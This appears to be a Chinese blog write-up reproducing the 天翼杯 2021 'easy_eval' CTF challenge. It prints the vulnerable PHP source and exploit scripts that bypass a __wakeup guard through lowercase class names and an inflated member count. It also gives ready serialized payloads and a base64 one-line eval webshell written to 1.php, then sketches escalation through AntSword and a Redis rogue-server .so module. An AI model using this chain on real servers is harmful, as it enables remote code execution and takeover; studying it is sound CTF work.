[天翼杯 2021]esay_eval复现

发布于:2024-08-20 ⋅ 阅读:(147) ⋅ 点赞:(0)

利用脚本

https://github.com/Dliv3/redis-rogue-server

antsword插件

https://github.com/Medicean/AS_Redis?tab=readme-ov-file#%E5%B7%B2%E7%9F%A5%E9%97%AE%E9%A2%98

 <?php
class A{
    // Challenge gadget: any call to an undefined method on an A instance
    // evaluates whatever string is stored in $code. This is the code
    // execution sink of the challenge.
    public $code = "";
    function __call($method,$args){
        // $method and $args are ignored; only the (unserialized, hence
        // attacker-controlled) $code string reaches eval().
        eval($this->code);
        
    }
    // Intended guard: a deserialized A has $code cleared before it can be
    // used, so the sink is only reachable if __wakeup() does not run.
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    // Trigger gadget: on destruction, calls a() on whatever object sits in
    // $a. $a is never declared on B, so it only exists as a dynamic property
    // set during unserialize(). When it holds an A (which defines no a()
    // method), the call dispatches to A::__call.
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    // Guard: capture the declared member count that follows each "A" or "B"
    // class-name token in the serialized text and refuse anything other
    // than exactly 1. The pattern is case-sensitive, while PHP resolves
    // class names case-insensitively, so objects spelled with lowercase
    // class names are never inspected by this check.
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    // presumably always set after preg_match_all (an empty group array on no
    // match), so the branch is effectively unconditional
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        // NOTE(review): unserialize() on request data is the actual defect;
        // a textual check on the member count is not a substitute for never
        // deserializing untrusted input (json_decode() is the safe exchange
        // format). Left as-is because this is the challenge source.
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

<?php
class a{
    // Local stand-in for the target's class A: it only needs the same
    // property name ($code) so the serialized object deserializes into the
    // real A, whose __call() evaluates $code. The lowercase spelling makes
    // the serialized form read O:1:"a", which the target's case-sensitive
    // "[BA]" filter does not match; PHP itself maps it to class A.
    public function __construct() {
        $this->code= "phpinfo();";
    }
    public $code = "";
    
}
class b{
    // Local stand-in for the target's class B; carries the A instance whose
    // undefined a() method routes through __call on the target.
    public function __construct() {
        // PHP class names are case-insensitive, so new A() instantiates the
        // lowercase class a defined above (hence O:1:"a" in the output).
        $this->a = new A();
    }
    public function __destruct(){
        
        echo $this->a->a();// a() is undefined, so __call is invoked
        
}
}
// NOTE(review): this destructor also fires locally when the generator script
// ends, and the local class a has no __call(), so a "call to undefined
// method" error follows the serialized output — harmless for generation.
$a=new b();
echo serialize($a);
// Serialized form as emitted (inner object declares 1 member):
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
// Hand-edited form actually submitted (inner member count raised to 2):
//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:10:"phpinfo();";}}
// Declaring more members than the class really has bypasses __wakeup().
// NOTE(review): whether unserialize() skips __wakeup on a member-count
// mismatch depends on the target's PHP version — patched releases changed the
// handling of this case, so confirm against the target runtime.

查看禁用函数disable_functions

fopen和fputs没有被禁用,写🐎

<?php
// Base64 form of the PHP source that $code below writes to 1.php; encoding it
// keeps the quotes out of the eval'd string.
$payload=base64_encode('<?php @eval($_POST["123"]);');
class a{
    // Same stand-in for the target's class A as in the previous script, but
    // $code now writes the base64-decoded payload to 1.php via
    // fopen()/fputs(), the file functions the target's disable_functions
    // did not cover. Defender note: the artefact of this stage is a new PHP
    // file in the document root, which web-root integrity monitoring catches.
    public function __construct() {
        // $payload is read from file scope (set at the top of this script).
        global $payload;
        $this->code= "fputs(fopen('1.php','w+'),"."base64_decode(\"".$payload."\"));";
    }
    public $code = "";
    
}
class b{
    // Local stand-in for the target's class B; carries the A instance whose
    // undefined a() method routes through __call on the target.
    public function __construct() {
        // Case-insensitive class names: new A() instantiates the lowercase
        // class a defined above.
        $this->a = new A();
    }
    public function __destruct(){
        
        echo $this->a->a();// a() is undefined, so __call is invoked on the target
        
}
}
// NOTE(review): locally, class a has no __call(), so this destructor raises a
// "call to undefined method" error after the serialized output is printed.
$a=new b();
echo serialize($a);
// Serialized form as emitted (inner object declares 1 member):
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:81:"fputs(fopen('1.php','w+'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7"));";}}
// Hand-edited form submitted (inner member count raised to 2 to skip __wakeup,
// same version-dependent caveat as in the first script):
//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:81:"fputs(fopen('1.php','w+'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyIxMjMiXSk7"));";}}

antsword连一下

vim -r config.php.swp 查看swp文件

 

redis默认端口6379

在html目录下新建456目录,然后把.so文件传上去

antsword加载插件->数据管理->redis管理,输入密码连接上去,执行一波指令

